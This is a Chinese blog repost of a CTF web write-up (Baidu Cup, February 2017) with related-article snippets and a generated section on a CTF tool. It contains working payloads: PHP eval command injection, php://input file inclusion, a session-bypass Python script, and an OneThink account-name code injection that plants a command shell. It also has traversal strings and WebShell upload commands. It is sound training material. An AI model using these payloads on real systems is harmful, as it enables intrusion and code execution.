“百度杯”CTF比赛(二月场)-web-writeup

最新推荐文章于 2022-09-08 19:11:50 发布
最新推荐文章于 2022-09-08 19:11:50 发布
阅读量318 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php python runtime
原文链接:http://www.cnblogs.com/zhengjim/p/6666961.html
本文详细解析了CTF游戏中的几个挑战题目,包括利用PHP全局变量、命令执行、Session变量等技巧解决难题的方法,并介绍了如何利用网站配置不当进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

爆破一:

打开网页看到源代码:

 

根据提示这题就是找变量的值,本想爆破,但不太现实。百度 php获取变量的值 有个超全局数组 $GLOBALS 

爆破二:

打开网页看到源代码:

看到了eval() 函数,想到命令执行

提示不在变量中,应该再flag.php

Exp:

?hello=);system("cat flag.php");//

闭合前面,注释后面

但有一个问题,就是会被i春秋自己的waf挡,我们改成post,然后传一个参数,让其值大约2万个左右。

 

 

爆破三:

打开网页看到源代码:

 

有三个SESSION变量 nums:计数 time:记时 whoami:有个初始值 然后将$str_rands 生成的随机字符赋值给它。

$str_rands 就是生成2位随机的26字母

当满足$_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0 nums+1

 

写个脚本测试发现当md5(数组),条件即为真。

<?php

  error_reporting(0);

  $arr=$_GET['a'];

  if (substr(md5($arr),5,4)==0){

    echo 'yes';

    }

  else{

    echo 'no';

  }

?>

  

所以第一次访问

http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/?value[0]=e&value[1]=a

后面依次传值,10以上就行。

Python脚本:

 

#!usr/bin/env python
#!coding=utf-8

__author__ = 'zhengjim'

import requests

aa = requests.session()
code = aa.get('http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/?value[0]=e&value[1]=a').text
# print code
cc = code[:2]
for i in xrange(10):
    url = 'http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/index.php?value[0]={}&value[1]={}'.format(cc[0],cc[1])
    flag= aa.get(url=url).text
    cc = flag[:2]
print flag

 

  

include

 

看到allow_url_include开启:

 

直接 php://input就行啦

ls看有什么文件,然后cat。

 

 

zone

没写出来。

参考:http://www.cnblogs.com/Mrsm1th/p/6600876.html

利用nginx 配置不当导致目录遍历下载漏洞。

 

 

onethink

百度找到onethinnk的一个漏洞。

参考:http://www.hackdig.com/06/hack-36510.htm

 

 

就是注册个账号为:

 

%250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号长度有限制。所以分别两个来注册

 

账号一:%0a$a=$_GET[a];//

 

账号二:%0aecho `$a`;//

 

burp来改包,不然会失败。

 

依次登入,也要用burp来改包登入。

 

 

 

然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php

 

查找下flag位置 cat就行了。

 

/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php

 

 

转载于:https://www.cnblogs.com/zhengjim/p/6666961.html

百度CTF比赛2017年2月WP--web
Oavinci的博客
06-02 1068
一、爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于“李华”。就是说,你可以通过这个全局数组来访问任何一个变量,所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。 审计代码可以知道,我们可以用GET传值方式?hello=...
百度ctf2月web-include
Radiation's Blog
03-14 2116
打开题目链接,显示如下内容:显示的代码如下:<?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); }可以知道这是个文件包含的题目,只要我们去读出包含有flag的文件就可以了,由于我们不知道包含于哪个文件
百度CTF比赛 2017 二月_onthink
a173262565的博客
04-07 331
题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数 百度找到onethinnk的一个漏洞。 参考:http://www.hackdig.com/06/hack-36510.htm 就是注册个账号为: %250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号...
---百度CTF比赛 2017 二月---------------include
qq_43182466的博客
04-26 337
ctrl+f查找allow_url_include ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190426220537866.png 可以构造?path=php://input 发现有个奇怪的文件名,访问它<?php echo 'cat dle345aae.php'?>出不来,但是看writeup上上条语句可以得到flag ...
百度CTF比赛 2017 二月---------------include
大方子
09-04 1418
================================ 个人收获: 1.网页的输出不一定会出现在页面上,也可能在页面源码里面 2.当php开启allow_url_include的时候,可以用php://input伪协议包含文件 3. php://filter/read=convert.base64-encode/resource=[文件路径] 函数读取文件内容 4.php...
百度CTF比赛 2017 二月 include
SPS98
11-05 670
题目说的很明确, 直接告诉说是文件包含漏洞, 看了下分值感觉应该没有什么套路
i春秋 “百度CTF比赛 十月 vld writeup
weixin_43442029的博客
01-19 816
0x00 题目名字叫“vld”,打开链接后也提示“do you know Vulcan Logic Dumper?” 同时在源码也给了一个文件位置。 打开文件后是一堆看不懂的东西,在网上搜索一下Vulcan Logic Dumper,发现是一个php的调试器,index.php.txt里的内容是php的详细的运行过程。大概的逻辑是比较三个get参数的值,正确就输出下一条线索,错误就输出false...
i春秋 “百度CTF比赛 九月 XSS平台
include_heqile的博客
09-10 4866
https://www.ichunqiu.com/battalion?t=1 这道题是一道代码审计题,对于我这个萌新来说,不看大佬们的writeup是根本无从下手的,得到的提示就是github上的开源项目Rtiny:https://github.com/r0ker/Rtiny-xss/tree/master 大佬们是通过构造非法参数来让网页返回错误信息的,如下: 然后就可以搜索到这个项目...
i春秋 “百度CTF比赛 十月 登陆
include_heqile的博客
10-11 2620
https://www.ichunqiu.com/battalion?t=1&amp;r=0 进入题目链接,是一个登陆框 尝试admin' or 1=1#,密码随便输,返回页面密码错误 再尝试用户名随便输,密码随便输,返回页面用户名不存在 确定为bool盲注 使用python脚本执行盲注: #-*- coding:utf-8 -*- from urllib.request import urlop...
i春秋 “百度CTF比赛 十月 GetFlag
include_heqile的博客
09-22 1256
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;r=0 进入题目链接,是一个调侃界面,调侃单身狗的,然后我们进入login界面,这两个界面的源代码中都没有任何提示,但是我在目录中发现了flag.php文件,不过没有任何线索,页面源代码中也没有任何线索。。。。。 任何就老老实实的看登陆页面,我开始并没有正确理解那个验证码框,我以为只要输入他页面上的substr(...
i春秋-百度CTF比赛 2017 二月-WEB-include
lovelj的博客
12-31 2545
题目名称: include 题目内容: 没错!就是文件包含漏洞。 打开界面后显示如下信息,展示phpinfo页面及源码 看题目也能猜到是文件包含,关键是如何知道文件的名字呢? 搜索一下allow_url_include看看是否打开: 打开的,可以使用php://input协议,使用post传递参数<?php system("ls");?> 得到: 直接使用php://filter/read=convert.base64-encode/resource=dl.
i春秋 “百度CTF比赛 2017 二月 Web writeup
Senimo
03-28 1424
i春秋 “百度CTF比赛 2017 二月 Web writeup爆破-1爆破-2爆破-3includeZoneOneThink 爆破-1 分值:10分 类型:MiscWeb 题目内容:flag就在某六位变量中。 启动靶机,打开题目: 进入页面为一段源码,分析代码: 包含flag.php文件 需要传入变量hello的值 正则表达式匹配:一个或多个[A-Za-z0-9_] var_dump(...
百度CTF比赛 2017 二月爆破-2 writeup
xuchen16的博客
09-04 561
分值:10分 类型:Misc Web已解答 题目: flag不在变量中。 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__);  题目知识点: file_get_contents(path)函数,获得指定路径下的文件内容,以字符串的形式返回...
百度 二月web-include By Assassin [文件包含漏洞]
Assassin
03-17 1431
打开题目链接可以看到这就是典型的文件包含漏洞(当然题目中也是告诉你了,就是文件包含漏洞),之前不是很了解文件包含漏洞是什么,在这里实现了一下。大概找了一下,有位大哥小小总结了一下技巧1.基本的文件包含漏洞: code : * 包含同路径下的文件: ?file=.htaccess * 路径遍历: ?file=../../../../../../../../../var/lib/locate.db (
百度CTF比赛 九月-web-Code
wallacegen的博客
05-30 345
i春秋平台上有环境 打开之后是一张图片,查看网页源码,发现图片的src后面跟了一大堆base64,这种格式在Data URI scheme有规定。 关于Data URI scheme,可参考这篇文章 图片的base64不用拿出去解码,因为是图片的二进制表示,所以解码也没有意义。 既然请求可以获取图片,这有点像ssrf,那么能不能请求一些敏感的文件呢? 首先请求index.php,?jpg=index.php,发现是有数据的,base64解码得到如下代码,注释如下 <?php /** * Create
i春秋“百度二月第二Web专题
wodafa的博客
02-22 2225
Misc&Web 1 查看源码,得知限制了只允许数字字母下划线 利用超全局变量 $GLOBALS Misc&Web 2 很明显的代码注入 获得flag Misc&Web 3 SESSION nums需要>=10返回flag 初始化为0 其中substr(md5($value),5,4)==0是恒成立的 只要满足whoami 等于就会  对nu
ctf-wp-百度CTF比赛 2017 二月 include
key_nothing的博客
09-30 1275
考察文件包含 打开题目:发现 allow_url_include on 直接构造?path=php://input post参数&lt;?php echo system('ls');?&gt;列出文件名看看: 发现有个奇怪的文件:dle345aae.php 查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后...
百度CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
ctfshow web29-38(命令执行)
y4615184的博客
09-08 606
ctfshow web入门 29-38(命令执行)
ctf比赛利用ctftools-all-in-one进行web题目的解题
最新发布
06-30
CTF比赛中,使用 `ctftools-all-in-one` 工具可以帮助选手快速定位问题、自动化测试以及提高解题效率。该工具集成了多种Web类题目常用的插件和功能,能够应对常见的漏洞检测与利用景,如SQL注入、XSS、文件包含、目录扫描等。 ### 使用 `ctftools-all-in-one` 解决 Web 类题目的方法 #### 1. **环境准备** 确保你已经下载并安装了 `ctftools-all-in-one` 工具包,同时具备 Python 环境支持。通常该工具依赖于 Python 3 和一些第三方库,例如 `requests`、`BeautifulSoup`、`lxml` 等。 ```bash pip install requests beautifulsoup4 lxml ``` #### 2. **基础扫描功能** `ctftools-all-in-one` 提供了基本的网站扫描功能,可以用于发现隐藏路径、备份文件、常见配置文件等。 ```bash python ctftools.py dirscan -u http://example.com ``` 此命令将对目标网站进行目录扫描,识别 `.git`、`.DS_Store`、`robots.txt`、`backup.zip` 等敏感资源,适用于像引用[4]中提到的源码泄漏情况 [^4]。 #### 3. **SQL 注入检测** 该工具内置 SQL 注入检测模块,可以自动探测是否存在注入点,并尝试提取数据库信息。 ```bash python ctftools.py sqli -u http://example.com/login.php --data "username=admin&password=123" ``` 此命令会对登录接口进行 POST 请求注入测试,适用于 Web 类题目中常见的登录框绕过或数据库信息获取景 [^4]。 #### 4. **XSS 漏洞检测** 对于存在用户输入输出的页面,如留言本、评论框等,`ctftools-all-in-one` 可以自动探测 XSS 漏洞。 ```bash python ctftools.py xss -u http://example.com/submit.php --data "comment=test" ``` #### 5. **文件上传漏洞检测** 该工具支持检测是否存在可利用的文件上传漏洞,并尝试上传 WebShell。 ```bash python ctftools.py upload -u http://example.com/upload.php --file shell.php ``` #### 6. **Cookie 注入与会话劫持** 通过设置自定义 Cookie 或模拟登录,可以尝试进行会话固定、越权访问等操作。 ```bash python ctftools.py cookie -u http://example.com/dashboard.php --cookie "PHPSESSID=abc123xyz" ``` #### 7. **结合实战案例分析** 在实际 CTF 比赛中,Web 题目往往需要综合运用多个技巧。例如,在引用[4]中提到的 `.DS_Store` 泄漏事件,可以通过以下命令检测: ```bash python ctftools.py dsstore -u http://example.com/.DS_Store ``` 该命令将解析 `.DS_Store` 文件内容,提取出可能存在的源码路径,进而下载源码进行审计,寻找 flag 所在位置 。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值